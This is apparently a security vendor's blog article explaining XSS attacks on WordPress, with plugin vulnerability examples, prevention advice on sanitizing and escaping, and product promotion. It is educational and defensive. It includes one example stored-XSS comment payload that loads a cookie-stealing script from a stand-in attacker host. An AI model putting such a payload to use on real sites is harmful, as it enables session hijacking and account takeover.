911 Hack Removal

What is XSS Attack in WordPress? How to Prevent it?

Updated on: February 7, 2022

What is XSS Attack in WordPress? How to Prevent it?

Article Summary

Cross-site scripting, also known as XSS in short, is a security vulnerability found in web applications. WordPress XSS exploit allows attackers to inject malicious content under the guise of a trusted entity. Further, an XSS vulnerability also compromises user-website interaction. It allows attackers to pose as legitimate users and upload malicious content, steal user credentials and information, deface your website and tarnish your brand.

Cross-site scripting, also known as XSS in short, is a security vulnerability found in web applications. WordPress XSS exploit allows attackers to inject malicious content under the guise of a trusted entity. Further, an XSS vulnerability also compromises user-website interaction. It allows attackers to pose as legitimate users and upload malicious content, steal user credentials and information, deface your website and tarnish your brand.
WordPress XSS exploit recently made the news when a company specializing in software analysis released details of cross-site scripting vulnerability found in WordPress v5.11 and below.

Symptoms of WordPress XSS attack

XSS vulnerabilities are one of the most commonly observed vulnerabilities, yet they are the most overlooked. XSS is a cyber flaw that allows users (or hackers posing as users) to inject malicious code into a page allowing arbitrary input.
XSS exploits are classified into stored and reflected.
  1. Stored cross-site scripting means the hacker has injected a malicious script into a vulnerable page, which is run every time an unsuspecting victim visits the infected page.
  2. Reflected cross-site scripting is when an attacker injects malicious code inside a single HTTP request and the injected payload is included in the response with no security measures taken to prevent its execution. What makes Reflected XSS different is that the injected payload is not stored anywhere on the web application.
Here is how the XSS attack is carried out:
  1. Hacker (H) creates an account on your website.
  2. H observes that your website contains a stored XSS vulnerability. If someone posts a comment containing HTML tags in it, the tags will be displayed as it is, and any script tags get to run.
  3. In the comment section of an article, H inserts text with a script tag like: I am in love with your website <script src="http://mallorysevilsite.com/authstealer.js">
  4. When a user (U) loads the page with the comment, the script tag runs and steals U’s authorization cookie
  5. The stolen cookie gets sent to H’s secret server enabling him to impersonate the unsuspecting user U.

Get the ultimate WordPress security checklist with 300+ test parameters

Consequences of WordPress XSS Attack

XSS exploits could get you locked out of your website. It could also be used to impersonate you and tarnish your brand’s image. There is an unending list of what hackers are capable to do by exploiting the XSS vulnerability. Here are a few of them.

Stolen Cookies

Cookie theft is a common exploit of XSS vulnerability. Cookies are small files that hold data specific to the user and website. Hackers could use stolen cookies to impersonate as a legitimate user and use access for malicious intent.

Compromised Passwords

Password managers make it convenient for users to manage accounts of different websites. Password managers auto-fill passwords for users. Hackers could use the vulnerability to create a password input. When the password manager auto fills the password the hacker reads the password and sends it to his own domain. Now, the hacker could pose as a legitimate user and gain access to information on your website.

Port Scan

XSS could also be exploited to run port scans to the local network of anyone who visits the vulnerable website. If gained access to the network, the attacker could hack into other devices on the network. To execute such attacks attackers inject code that scans internal network and reports to the attacker.

Cross-Site Request Forgery

Cross-site request forgery (CSRF) provides the attackers the capability to force end users to execute unwanted tasks. Depending upon the type of website the attacker could request a connection, send a message, change log-in credentials, transfer cryptocurrency or commit a backdoor to the source code repository.


JavaScript can be used to perform keyboard capturing. JavaScript provides coders the capability to log keystrokes performed by a user on a vulnerable page. Some commercial web sites have made available some codes that can be used to log visitor movements in the form of clicks, mobile gestures or input. These could prove to be disastrous in the hands of malevolent beings.

See our Intelligent Firewall and Malware Scanner in action

Stop bad bots, SQLi, RCE, XSS, CSRF, RFI/LFI and thousands of cyberattacks and hacking attempts.
Try Free Trial
Let us know if you like it 😃

Examples of WordPress XSS Attack

XSS is the most common vulnerability that provides malicious actors backdoor entry into thousands of websites every year. These are a few recent examples of WordPress XSS exploit.

Slimstat plugin exploit (May 2019)

Slimstat is a popular web analytics plug-in that was recently found vulnerable to stored XSS vulnerability. Slimstat is used for tracking website analytics in real time, it monitors and reports stats of access logs, returning customers and registered users, JavaScript events, etc. Imagine the amount of website data that the hacker could access by exploiting the vulnerability.
The vulnerability was present in versions 4.8 and below. It allowed any unauthenticated visitor to inject arbitrary JavaScript code on the plugin access log functionality. Websites that were using the latest version of WordPress and were under the protection of Astra WAF were safe from the attackers.

Facebook Messenger Live Chat

A persistent XSS vulnerability in FB messenger live chat by Zotabox was uncovered.
Through WordPress, AJAX functionality makes it simple to send and receive data to and from the script without needing to reload the page. The function update_zb_fbc_code is accessible to anyone.
The function wp_ajax_update_zb_fbc_code is prescribed for authorized users only & wp_ajax_nopriv_update_zb_fbc_code is for non-privileged users. Both use the same function “update_zb_fbc_code. This allows any user (logged in or not) to modify the plugin settings. Malicious actors could use this vulnerability to gain higher priority access to confidential information.

Prevention of XSS Attack in WordPress

Taking security for granted will cost you very dearly in today’s cyber-lithic age. A strong sanitizing and validating system can protect your website from the exploit of the kinds of XSS and CSRF etc. Read on to find more about it.

Update WordPress files

The fastest and easiest way to solve the vulnerability issues related to WP v5.11 and below is to update WordPress to the latest version.

Validate input

Examine and validate all input data before sending it to the server. Accept input only from validated, trusted users. For example: Follow the following function to validate email-id inputted by the user.
  1. Filter_var PHP Function
  2. Filter_var($_GET[‘email’], FILTER_VALIDATE_EMAIL)
  3. is_email

Sanitize Data

Sanitizing data input by the user is highly recommended on sites that allow HTML markup. You can make sure that the data does no harm to either your users or your database by cleaning the data of potentially harmful markup. WordPress has great features to filter out unreliable data entries. Here is a list of WP commands you can use to sanitize your data.
  • sanitize_email
  • sanitize_file_name
  • sanitize_text_field
  • esc_url_raw
  • sanitize_option
  • sanitize_key
  • sanitize_mime_type
  • wp_kses
  • Sanitize_meta

Escape data

Escaping data means ensuring data security by censoring the data entered. It ensures that the key characters in the data are not misinterpreted in a malicious manner. The five basic escaping functions that WordPress provides are:
  • esc_html
  • esc_url
  • esc_js
  • esc_attr
  • esc_textarea

Encode data on output

Encode all HTTP response that outputs the data entered by the user. This would prevent it from being interpreted as active content. Encoding is merely converting every character to its HTML entity name. You can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in an intended manner.

Use a web application firewall

Having a security guard on your website always helps. WAF or Web Application Firewalls provide security against potential vulnerabilities. Astra WAF filters malicious traffic and provides intelligent protection to your website. It blocks XSS, SQLi, CSRF, bad bots, OWASP top 10 & 100+ other cyber attacks. Our intelligent firewall detects visitor patterns on your website & automatically blocks hackers with malicious intent.

Firewall working
How Astra Web Application Firewall protects your WordPress website

On average, a website is attacked by malware 44 times per day. Safeguard yours now with the Intelligent Firewall and Malware Scanner.

See Pricing
Join thousands of sites that trust Astra to manage their security.

Regular malware scanning

Regular malware scanning lets you warned well in before. Astra WordPress Security Suite offers complete protection with its on-demand Malware Scanner which flags malicious files on just a click. Plus our intelligent malware scanner keeps on evolving with each scan. Click here to get an Astra demo now.

Mahima Maheshwari

She is an Embedded Systems Engineer and a cybersecurity enthusiast. She spends most of her free time researching & reading. And loves to spread knowledge through blogs.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Newest Most Voted
Inline Feedbacks
View all comments
4 years ago

Thank you Mahima,

Zotabox fixed this issue with our plugin within 12 hours of being notified from WordPress who also approved our fix. We also sent out multiple emails to everyone affected immediately.

We have not had further issues since our update.

Thanks for reporting.

Shikhil Sharma
4 years ago
Reply to  Zotabox

Hi there! Thank you for your update, we will update this information in the article 🙂

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany